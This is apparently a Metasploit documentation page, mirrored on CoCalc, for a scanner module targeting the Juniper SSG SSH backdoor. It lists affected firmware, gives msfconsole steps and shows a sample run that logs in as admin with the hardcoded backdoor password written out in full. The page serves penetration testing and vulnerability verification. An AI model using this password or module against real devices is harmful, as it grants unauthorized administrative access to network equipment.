CoCalc -- juniper_backdoor.md

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/auxiliary/scanner/ssh/juniper_backdoor.md
Views: ¹¹⁷⁸⁴

Vulnerable Application

Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.

A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): here

For verification purposes, an example vuln python script is also available here

Verification Steps

Install the application
Start msfconsole
Do: use auxiliary/scanner/ssh/juniper_backdoor
Do: set rhosts
Do: run
You should see: [+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u

Scenarios

Example run against a Juniper SSG5 with vuln firmware from above link.

msf > use auxiliary/scanner/ssh/juniper_backdoor
msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
rhosts => 192.168.1.1
msf auxiliary(juniper_backdoor) > set verbose true
verbose => true
msf auxiliary(juniper_backdoor) > run

[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Vulnerable Application

Verification Steps

Scenarios

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Vulnerable Application

Verification Steps

Scenarios

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.